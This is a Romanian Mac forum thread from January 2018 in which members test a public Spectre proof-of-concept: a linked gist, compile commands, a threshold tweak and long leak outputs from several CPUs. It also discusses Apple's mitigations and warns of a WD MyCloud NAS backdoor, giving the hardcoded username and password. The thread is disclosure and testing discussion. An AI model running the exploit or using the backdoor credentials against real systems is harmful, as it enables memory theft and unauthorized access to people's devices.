(IN)Securitate
Trimis: 04 Ianuarie 2018 07:50 PM
[ Ignoră ]
[ # 61 ]
Sr. Member
Din: București
Macuser din: 23.03.09
Whopsie.
Cod Proof of Concept pentru Spectre:
https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
Nu că aș pricepe prea bine cum funcționează dar sunt două threaduri, unul victimă cu o variabilă denumită secret, iar celălalt thread îi fură secretul prin tehnica descrisă, îi cred.
Pe linia cu
#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
trebuie un spațiu înainte de (80).
gcc - std = c99 - O0 spectre . c - o spectre
Rezultat pe Mac Mini 2014, High Sierra 10.13.2 (carevasăzică peticit deja pentru Meltdown):
$ ./ spectre Reading 40 bytes : Reading at malicious_x = 0xfffffffffffffeb6 ... Success : 0x54 = ’T’ score = 2 Reading at malicious_x = 0xfffffffffffffeb7 ... Unclear : 0x68 = ’h’ score = 994 ( second best : 0x02 score = 809 ) Reading at malicious_x = 0xfffffffffffffeb8 ... Unclear : 0x65 = ’e’ score = 983 ( second best : 0x02 score = 804 ) Reading at malicious_x = 0xfffffffffffffeb9 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xfffffffffffffeba ... Success : 0x4D = ’M’ score = 2 Reading at malicious_x = 0xfffffffffffffebb ... Success : 0x61 = ’a’ score = 15 ( second best : 0x01 score = 5 ) Reading at malicious_x = 0xfffffffffffffebc ... Success : 0x67 = ’g’ score = 27 ( second best : 0x02 score = 11 ) Reading at malicious_x = 0xfffffffffffffebd ... Success : 0x69 = ’i’ score = 13 ( second best : 0x02 score = 4 ) Reading at malicious_x = 0xfffffffffffffebe ... Success : 0x63 = ’c’ score = 11 ( second best : 0x02 score = 3 ) Reading at malicious_x = 0xfffffffffffffebf ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xfffffffffffffec0 ... Success : 0x57 = ’W’ score = 2 Reading at malicious_x = 0xfffffffffffffec1 ... Success : 0x6F = ’o’ score = 2 Reading at malicious_x = 0xfffffffffffffec2 ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xfffffffffffffec3 ... Unclear : 0x64 = ’d’ score = 948 ( second best : 0x02 score = 671 ) Reading at malicious_x = 0xfffffffffffffec4 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xfffffffffffffec5 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xfffffffffffffec6 ... Unclear : 0x61 = ’a’ score = 991 ( second best : 0x02 score = 701 ) Reading at malicious_x = 0xfffffffffffffec7 ... Unclear : 0x72 = ’r’ score = 995 ( second best : 0x02 score = 784 ) Reading at malicious_x = 0xfffffffffffffec8 ... Unclear : 0x65 = ’e’ score = 989 ( second best : 0x02 score = 823 ) Reading at malicious_x = 0xfffffffffffffec9 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xfffffffffffffeca ... Unclear : 0x53 = ’S’ score = 958 ( second best : 0x02 score = 779 ) Reading at malicious_x = 0xfffffffffffffecb ... Unclear : 0x71 = ’q’ score = 987 ( second best : 0x02 score = 823 ) Reading at malicious_x = 0xfffffffffffffecc ... Success : 0x75 = ’u’ score = 2 Reading at malicious_x = 0xfffffffffffffecd ... Unclear : 0x65 = ’e’ score = 991 ( second best : 0x02 score = 670 ) Reading at malicious_x = 0xfffffffffffffece ... Success : 0x61 = ’a’ score = 9 ( second best : 0x01 score = 2 ) Reading at malicious_x = 0xfffffffffffffecf ... Unclear : 0x6D = ’m’ score = 967 ( second best : 0x02 score = 740 ) Reading at malicious_x = 0xfffffffffffffed0 ... Success : 0x69 = ’i’ score = 381 ( second best : 0x02 score = 188 ) Reading at malicious_x = 0xfffffffffffffed1 ... Unclear : 0x73 = ’s’ score = 982 ( second best : 0x02 score = 777 ) Reading at malicious_x = 0xfffffffffffffed2 ... Unclear : 0x68 = ’h’ score = 989 ( second best : 0x02 score = 861 ) Reading at malicious_x = 0xfffffffffffffed3 ... Unclear : 0x20 = ’ ’ score = 959 ( second best : 0x02 score = 753 ) Reading at malicious_x = 0xfffffffffffffed4 ... Unclear : 0x4F = ’O’ score = 974 ( second best : 0x02 score = 775 ) Reading at malicious_x = 0xfffffffffffffed5 ... Unclear : 0x73 = ’s’ score = 995 ( second best : 0x02 score = 784 ) Reading at malicious_x = 0xfffffffffffffed6 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xfffffffffffffed7 ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xfffffffffffffed8 ... Success : 0x02 = ’ ? ’ score = 7 ( second best : 0x66 score = 1 ) Reading at malicious_x = 0xfffffffffffffed9 ... Unclear : 0x72 = ’r’ score = 986 ( second best : 0x02 score = 728 ) Reading at malicious_x = 0xfffffffffffffeda ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xfffffffffffffedb ... Success : 0x67 = ’g’ score = 15 ( second best : 0x01 score = 5 ) Reading at malicious_x = 0xfffffffffffffedc ... Success : 0x65 = ’e’ score = 7 ( second best : 0x02 score = 1 ) Reading at malicious_x = 0xfffffffffffffedd ... Unclear : 0x2E = ’ . ’ score = 889 ( second best : 0x02 score = 755 ) $
Concluzie: o fi 10.13.2 pătchuit pentru Meltdown dar .. All your Macs are belong to us ...
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 04 Ianuarie 2018 08:09 PM
[ Ignoră ]
[ # 62 ]
Sr. Member
Din: București
Macuser din: 23.03.09
Și pe Ryzen 7 1700, FreeBSD 11.1 p6:
clang - std = c99 - O0 spectre . c - o spectre
root @ z8 :~ # ./spectre Reading 40 bytes : Reading at malicious_x = 0xffffffffffdffbf6 ... Success : 0x54 = ’T’ score = 2 Reading at malicious_x = 0xffffffffffdffbf7 ... Success : 0x68 = ’h’ score = 2 Reading at malicious_x = 0xffffffffffdffbf8 ... Success : 0x65 = ’e’ score = 2 Reading at malicious_x = 0xffffffffffdffbf9 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffdffbfa ... Success : 0x4D = ’M’ score = 2 Reading at malicious_x = 0xffffffffffdffbfb ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffdffbfc ... Success : 0x67 = ’g’ score = 2 Reading at malicious_x = 0xffffffffffdffbfd ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffdffbfe ... Success : 0x63 = ’c’ score = 2 Reading at malicious_x = 0xffffffffffdffbff ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffdffc00 ... Success : 0x57 = ’W’ score = 2 Reading at malicious_x = 0xffffffffffdffc01 ... Success : 0x6F = ’o’ score = 2 Reading at malicious_x = 0xffffffffffdffc02 ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffdffc03 ... Success : 0x64 = ’d’ score = 2 Reading at malicious_x = 0xffffffffffdffc04 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffdffc05 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffdffc06 ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffdffc07 ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffdffc08 ... Success : 0x65 = ’e’ score = 2 Reading at malicious_x = 0xffffffffffdffc09 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffdffc0a ... Success : 0x53 = ’S’ score = 2 Reading at malicious_x = 0xffffffffffdffc0b ... Success : 0x71 = ’q’ score = 2 Reading at malicious_x = 0xffffffffffdffc0c ... Success : 0x75 = ’u’ score = 2 Reading at malicious_x = 0xffffffffffdffc0d ... Success : 0x65 = ’e’ score = 2 Reading at malicious_x = 0xffffffffffdffc0e ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffdffc0f ... Success : 0x6D = ’m’ score = 2 Reading at malicious_x = 0xffffffffffdffc10 ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffdffc11 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffdffc12 ... Success : 0x68 = ’h’ score = 2 Reading at malicious_x = 0xffffffffffdffc13 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffdffc14 ... Success : 0x4F = ’O’ score = 2 Reading at malicious_x = 0xffffffffffdffc15 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffdffc16 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffdffc17 ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffdffc18 ... Success : 0x66 = ’f’ score = 2 Reading at malicious_x = 0xffffffffffdffc19 ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffdffc1a ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffdffc1b ... Success : 0x67 = ’g’ score = 2 Reading at malicious_x = 0xffffffffffdffc1c ... Success : 0x65 = ’e’ score = 2 Reading at malicious_x = 0xffffffffffdffc1d ... Success : 0x2E = ’ . ’ score = 2 root @ z8 :~ #
Asta ca să lămurim treaba cu AMD.
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 04 Ianuarie 2018 08:40 PM
[ Ignoră ]
[ # 63 ]
Sr. Member
Din: București
Macuser din: 23.03.09
PCEngines APU2, OpenBSD 6.2.
bios0 : PC Engines apu2 cpu0 : AMD GX - 412TC SOC , 998.48 MHz
# syspatch -l 001_tcb_invalid 002_fktrace 003_mpls
clang - std = c99 - O0 spectre . c - o spectre
# ./spectre Reading 40 bytes : Reading at malicious_x = 0xffffffffffeff070 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff071 ... Success : 0x68 = ’h’ score = 2 Reading at malicious_x = 0xffffffffffeff072 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff073 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff074 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff075 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff076 ... Success : 0x67 = ’g’ score = 2 Reading at malicious_x = 0xffffffffffeff077 ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffeff078 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff079 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff07a ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff07b ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff07c ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffeff07d ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff07e ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffeff07f ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff080 ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffeff081 ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffeff082 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff083 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff084 ... Success : 0x53 = ’S’ score = 2 Reading at malicious_x = 0xffffffffffeff085 ... Success : 0x71 = ’q’ score = 2 Reading at malicious_x = 0xffffffffffeff086 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff087 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff088 ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffeff089 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff08a ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffeff08b ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffeff08c ... Success : 0x68 = ’h’ score = 2 Reading at malicious_x = 0xffffffffffeff08d ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff08e ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff08f ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffeff090 ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffeff091 ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffeff092 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff093 ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffeff094 ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffeff095 ... Success : 0x67 = ’g’ score = 2 Reading at malicious_x = 0xffffffffffeff096 ... Success : 0xFF = ’’ score = 0 Reading at malicious_x = 0xffffffffffeff097 ... Success : 0xFF = ’’ score = 0
Parțial color, dar cu CACHE_HIT_THRESHOLD 130 merge:
# ./spectre Reading 40 bytes : Reading at malicious_x = 0xffffffffffeff070 ... Success : 0x54 = ’T’ score = 2 Reading at malicious_x = 0xffffffffffeff071 ... Success : 0x68 = ’h’ score = 2 Reading at malicious_x = 0xffffffffffeff072 ... Success : 0x65 = ’e’ score = 2 Reading at malicious_x = 0xffffffffffeff073 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffeff074 ... Success : 0x4D = ’M’ score = 2 Reading at malicious_x = 0xffffffffffeff075 ... Success : 0x61 = ’a’ score = 2 Reading at malicious_x = 0xffffffffffeff076 ... Success : 0x67 = ’g’ score = 2 Reading at malicious_x = 0xffffffffffeff077 ... Success : 0x69 = ’i’ score = 2 Reading at malicious_x = 0xffffffffffeff078 ... Success : 0x63 = ’c’ score = 2 Reading at malicious_x = 0xffffffffffeff079 ... Success : 0x20 = ’ ’ score = 2 Reading at malicious_x = 0xffffffffffeff07a ... Success : 0x57 = ’W’ score = 2 Reading at malicious_x = 0xffffffffffeff07b ... Success : 0x6F = ’o’ score = 2 Reading at malicious_x = 0xffffffffffeff07c ... Success : 0x72 = ’r’ score = 2 Reading at malicious_x = 0xffffffffffeff07d ... Success : 0x64 = ’d’ score = 2 Reading at malicious_x = 0xffffffffffeff07e ... Success : 0x73 = ’s’ score = 2 Reading at malicious_x = 0xffffffffffeff07f ... Success : 0x20 = ’ ’ score = 2 ...
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 05 Ianuarie 2018 03:04 AM
[ Ignoră ]
[ # 64 ]
Member
Din: Bucharest
Macuser din: 15.11.08
Vezi ca le-ai cam incurcat intre ele
Semnătură
Setup: cateva produse Apple pe care nu simt nevoia sa mi le afisez aici.
Trimis: 05 Ianuarie 2018 08:16 AM
[ Ignoră ]
[ # 65 ]
Sr. Member
Din: București
Macuser din: 23.03.09
Scuze, nu pricep, la ce te referi ? Ce-am încurcat cu ce ?
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 05 Ianuarie 2018 08:48 AM
[ Ignoră ]
[ # 66 ]
Sr. Member
Din: Iasi
Macuser din: 18.10.06
Maclean - 05 Ianuarie 2018 08:16 AM
Scuze, nu pricep, la ce te referi ? Ce-am încurcat cu ce ?
Meltdown cu Spectre, probabil.
Semnătură
Trimis: 05 Ianuarie 2018 10:01 AM
[ Ignoră ]
[ # 67 ]
Sr. Member
Din: București
Macuser din: 23.03.09
Păi nu, am zis că e Proof of Concept pentru Spectre. Probabil trebuia să fiu mai clar.
Spectre funcționează pe AMD. Și potențial pe ARM, deși acel cod are un include specific x86 și nu mă pricep suficient să-l modific pentru ARM. Și potențial pe PowerPC ...
Dar se pare că ar exista o soluție și pentru asta:
https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2311855
E de văzut. Tot ce putem face este să așteptăm patchuri.
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 05 Ianuarie 2018 01:18 PM
[ Ignoră ]
[ # 68 ]
Sr. Member
Din: București
Macuser din: 23.03.09
Apple a grăit: About speculative execution vulnerabilities in ARM-based and Intel CPUs
https://support.apple.com/en-us/HT208394
All Mac systems and iOS devices are affected
Apple has already released mitigations in iOS 11.2, macOS 10.13.2, and tvOS 11.2 to help defend against Meltdown. Apple Watch is not affected by Meltdown. In the coming days we plan to release mitigations in Safari to help defend against Spectre.
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 09 Ianuarie 2018 12:21 AM
[ Ignoră ]
[ # 69 ]
Administrator
Din: The Colony, TX
Macuser din: 11.10.05
A aparut update pt High Sierra.
Mac-ul tau nu suporta High Sierra ? La gunoi (reciclat) cu el.
Ai pus update-ul ? Enjoy un mac mai incet.
Explicatii despre Spectre & Meltdown
https://www.youtube.com/watch?v=I5mRwzVvFGE
https://xkcd.com/1938/
Mai pe scurt. Pentru ca sa mearga mai repede decat concurenta, CPU-urile Intel ruleaza cod in avans in timp ce asteapta dupa alte chestii (decizii). Acest cod rulat “in avans” NU respecta protectiile de access. Deci orice process (inclusiv un script de pe o pagina web) poate citi cam orice din memorie (parole, chei encriptie, date personale). Nu se poate repara decat modificand sistemul de operare sa goleasca memoria dupa fiecare operatiune (frana de mana) SAU instaland un alt CPU care are chestia asta reparata (deci nu la Mac, caci sunt lipite).
Semnătură
Apple: 5x macmini (G4, 2007, 2009, 2010, 2012)
UNIX: IBM 7011-250/AIX 5.1 , HP Jornada 680/JLime , HP 9000 F20/HP-UX 11.11
PC: PentiumD/Debian , HP t5300/Debian
Misc: Spectrum 48k, 8x Raspberry Pi, 2x CHIP
Trimis: 09 Ianuarie 2018 07:57 AM
[ Ignoră ]
[ # 70 ]
Sr. Member
Din: București
Macuser din: 23.03.09
psergiu - 09 Ianuarie 2018 12:21 AM
Mac-ul tau nu suporta High Sierra ? La gunoi (reciclat) cu el.
Nu pare nimic alb sau negru în povestea asta, totul e în foarte multe shades of gray .
Petecul pentru Meltdown este prezent în ultimile actualizări de securitate pentru Sierra și El Capitan.
Petecul tocmai croit ieri pentru Spectre se concentrează mai mult pe Safari, reduce rezoluția timer-ului folosibil de către un javascript să măsoare timpul în care procesorul răspunde, până la a nu mai putea determina dacă a dat răspunsul bazat pe date deja prezente în cache sau nu, ceea ce lasă un posibil exploit bazat pe Spectre fără târnăcop. Măsuri deja prezente de câteva zile în Chrome și Firefox. Și prezente în Safari 11.0.2 pentru Sierra și El Capitan:
To help defend against Spectre, Apple has released mitigations in iOS 11.2.2, the macOS High Sierra 10.13.2 Supplemental Update, and Safari 11.0.2 for macOS Sierra and OS X El Capitan .
Problema mare de tot râmăne nu atât la Mac-uri cât la dispozitivele iOS care nu pot fi actualizate la iOS 11.2.2. La un Mac mai poți folosi un Chrome, un TenFourFox pe PowerPC .
Tocmai a devenit iresponsabil să folosești orice browser pe iOS mai mic de 10.2.2 - pe iOS orice browser folosește WebKit engine-ul sistemului.
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 09 Ianuarie 2018 12:00 PM
[ Ignoră ]
[ # 71 ]
Member
Din: Bucuresti
Macuser din: 15.03.07
Ca sa inteleg si eu, daca nu ai High Sierra, esti vulnerabil? Nu vor sa faca update-uri si pentru OSX-urile mai vechi??
Semnătură
•touch•
Trimis: 09 Ianuarie 2018 12:23 PM
[ Ignoră ]
[ # 72 ]
Administrator
Din: județul Devon, UK
Macuser din: 18.10.05
Geekbench inainte de update-ul de securitate:
Single core: 4153
Multicore: 8471
OpenCL: 32024
Dupa update:
Single core: 4173
Multicore: 8325
OpenCL: 31713
Trimis: 09 Ianuarie 2018 03:24 PM
[ Ignoră ]
[ # 73 ]
Sr. Member
Din: București
Macuser din: 23.03.09
justme - 09 Ianuarie 2018 12:00 PM
Ca sa inteleg si eu, daca nu ai High Sierra, esti vulnerabil? Nu vor sa faca update-uri si pentru OSX-urile mai vechi??
https://support.apple.com/en-us/HT208394
Apple has released updates for iOS, macOS High Sierra, and Safari on Sierra and El Capitan to help defend against Spectre.
Există o diferență de formulare în felul în care Apple se referă la actualizarea High Sierra față de actualizarea Safari 11.0.2 pentru Sierra și El Capitan.
S-ar înțelege că actualizarea pentru High Sierra mai cuprinde și altceva. Ce anume, nu mi-e clar acum. Ar trebui făcut un vm cu High Sierra 10.13.1, aplicat 10.13.2, apoi 10.13.2 Supplemental Security Update, și făcute diff-uri, ca să ne lămurim exact.
Pentru că țin să vă spun că acel cod Proof-Of-Concept pentru Spectre merge bine mersi în continuare pe High Sierra cu ultima actualizare suplimentară pentru Spectre ...
Semnătură
Mac Mini Intel MGEN2LL/A, MC815LL/A - Sierra, MC239LL/A - ESXI 5.5, MB138LL/A Lion
Power Mac G4 M8787LL/A OpenBSD/macppc
Power Mac G5 Leopard
AppleTV2, iPhone 6+/64, iPhone 4, iPhone 2G
Trimis: 09 Ianuarie 2018 03:41 PM
[ Ignoră ]
[ # 74 ]
Sr. Member
Din: Tulcea
Macuser din: 26.08.06
Deci e mai sigur sa notam parolele intr-un carnetel/agenda ca odinioara?
Semnătură
13” Macbook Pro 2015
Trimis: 09 Ianuarie 2018 08:00 PM
[ Ignoră ]
[ # 75 ]
Administrator
Din: The Colony, TX
Macuser din: 11.10.05
Carnetel cu lacatel.
Alte stiri legate de scuritate:
Aveti cumva un NAS WD MyCloud ? Mai precis modelele: MyCloud, MyCloudMirror, My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100, si My Cloud DL4100 ?
Daca da, faceti ACUM upgrade la Firmware 2.30.172 sau mai nou.
Firmware-ul mai vechi, aru un backdoor in care oricine se poate conecta la el cu user: “mydlinkBRionyg” si parola “abc12345cba”. Chiar daca nu e vizibil din internet, un gigi rau poate sa-l se conecteze printr-un iFrame dintr-o pagina de web pe care o accesezi tu cu un browser de pe calculatorul-ul tau, daca nu i-ai schimbat numele NAS-ului din “mycloud” (cau ce alte nume standard sunt). iFrame-ul ala poate sa fie un singur pixel dintr-o reclama in coltul unei pagini de web - cat timp numele “mycloud” este accesibil peste bonjour/zero-conf/wins, un javascript se conecteaza cu userul si parola de mai sus si incepe sa caute fisiere si sa le uploadeze undeva in .ru sau asia.
Semnătură
Apple: 5x macmini (G4, 2007, 2009, 2010, 2012)
UNIX: IBM 7011-250/AIX 5.1 , HP Jornada 680/JLime , HP 9000 F20/HP-UX 11.11
PC: PentiumD/Debian , HP t5300/Debian
Misc: Spectrum 48k, 8x Raspberry Pi, 2x CHIP